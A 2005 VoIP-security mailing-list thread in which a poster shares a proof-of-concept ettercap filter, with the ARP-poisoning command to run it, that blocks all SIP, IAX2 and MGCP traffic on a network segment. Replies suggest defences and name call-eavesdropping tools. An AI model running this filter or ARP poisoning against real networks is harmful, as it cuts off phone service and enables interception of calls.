[VOIPSEC] VoIP Blocking Filter w/Ettercap
Natas
natas05 at gmail.com
Wed Jul 13 20:06:54 CDT 2005
With Cain & Abel you can do ARP poisoning and record/reconstruct SIP
or H.323 conversations that use the G711 uLaw, G771 aLaw, ADPCM, DVI4,
LPC, GSM610, Microsoft GSM, L16, G729, Speex or iLBC codecs.
On 7/13/05, Christopher A. Martin <chris at infravast.com> wrote:
> You can listen to g711 with ethereal.
>
> -----Original Message-----
> From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
> Behalf Of Nispel, Markus
> Sent: 07/13/2005 10:29 AM
> To: Credland, Jim; Natas; Voipsec at voipsa.org
> Subject: RE: [VOIPSEC] VoIP Blocking Filter w/Ettercap
>
> The tool you look for is probably VOMIT http://vomit.xtdnet.nl/
>
> In general you should look at preventing these MiTM Attacks by using
> Arpwatch like tools and/or implement authentication so you really only
> have trusted users on your network. It´s really a layered approach to
> this, there are multiple steps you can/should do
>
> Regards
>
> Markus
>
>
> Markus Nispel
> Office of the CTO
> Enterasys Networks
> markus.nispel at enterasys.com
>
>
>
> -----Original Message-----
> From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
> Behalf Of Credland, Jim
> Sent: Mittwoch, 13. Juli 2005 16:32
> To: Natas; Voipsec at voipsa.org
> Subject: RE: [VOIPSEC] VoIP Blocking Filter w/Ettercap
>
> Protecting a network to which people have physical access is tricky.
> Ettercap is a scary reminder of how easy it is to intercept/reroute and
> generally ethernet segments. If you've got a test network to try a man
> in the middle attack on using ettercap it's well worth it for the
> amusement value alone.
>
> In an enterprise environment requiring a high standard of VoIP security
> I'd definitely be considering something like 802.1x port authentication
> to reduce the risk from someone connecting a PC to the VoIP vLAN, and if
> it was readily available encryption of the voice and switching traffic.
>
> Much of the documentation on VoIP Security seems to skip over these
> kinds of problems, the NIST documents solution is use encryption,
> authentication and public keys. This does little about
> denial-of-service and has the lack of
> support for these kinds of features in many implementations. The Cisco
> VoIP security document used to suggests you don't let anyone bad near
> your switch - but I've noticed a new document on their site listing a
> whole load of layer 2 security features - see
> http://www.cisco.com/en/US/netsol/ns340/ns394/ns165/networking_solutions
> _whi
> te_paper0900aecd80240249.shtml - in the layer 2 defenses section. I'd
> be interested - if you test switch has these features - in whether or
> not you can cause much distruption with these features enabled.
>
> I think I saw a tool for listening to intercepted RTP streams but I
> forget what it's called?
>
> Luckly once you get out of your LAN environment to a central server or
> carrier environment where there are strong physical access controls then
> this kind of security becomes less critical and other problems raise
> their heads instead.
>
> jim.credland at thus.net
> Security Consultant
>
>
> > -----Original Message-----
> > From: Natas [mailto:natas05 at gmail.com]
> > Sent: 13 July 2005 02:09
> > To: Voipsec at voipsa.org
> > Subject: [VOIPSEC] VoIP Blocking Filter w/Ettercap
> >
> > After playing around with ettercap and its filter program,
> > etterfilter, I realized how easy it would be to ARP poison a network
> > and block all VoIP packets from passing through.
> > While packet manipulation obviously isn't new, and the root of the
> > problem comes from the ease of ARP poisoning, I was still kind of
> > shocked at how easy an attack like this could be pulled off in a real
> > world scenario.
> > A simple ettercap filter can be used to block all SIP, IAX2 and MGCP
> > traffic, stopping any possible communication across a network segment,
>
> > but letting other traffic properly pass through. Below is a basic
> > filter I wrote up for this list.
> >
> >
> > # blockvoip.filter
> > # Proof of concept VoIP blocking filter # By Natas # Instructions:
> > # Run "etterfilter blockvoip.filter -o blockvoip.ef"
> > # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
> >
> > if (ip.proto == UDP && udp.src == 4569) {
> > msg("Killed Attempted IAX2 Connection.\n");
> > drop();
> > kill();
> > }
> >
> > if (ip.proto == UDP && udp.src == 5060) {
> > msg("Killed Attempted SIP Connection.\n");
> > drop();
> > kill();
> > }
> >
> > if (ip.proto == UDP && udp.src == 2427) {
> > msg("Killed Attempted MGCP Connection.\n");
> > drop();
> > kill();
> > }
> >
> > # Don't know to much about MGCP Call Agent traffic but # I put it in
> > here for the hell of it.
> > if (ip.proto == UDP && udp.src == 2727) {
> > msg("Killed Attempted MGCP Call Agent Connection.\n");
> > drop();
> > kill();
> > }
> >
> > # End.
> >
> > Obviously this is just a simple example and could easily be expanded
> > to ensure that no VoIP traffic whatsoever passes through.
> >
> > I'm not sure how everyone here will feel about this little example but
>
> > I wanted to put it out there for everyone to see.
> > I have some other VoIP packet manipulation ideas that I am playing
> > around with.
> >
> > I enjoy the VoIPSA mailing list very much and like reading every ones
> > posts and concerns. If you would like to talk off the list, feel free
> > to email me or contact me at 206-338-3337.
> >
> > Natas
> >
> > _______________________________________________
> > Voipsec mailing list
> > Voipsec at voipsa.org
> > http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
> >
>
> _______________________________________________
> Voipsec mailing list
> Voipsec at voipsa.org
> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
>
>
> _______________________________________________
> Voipsec mailing list
> Voipsec at voipsa.org
> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
>
More information about the Voipsec
mailing list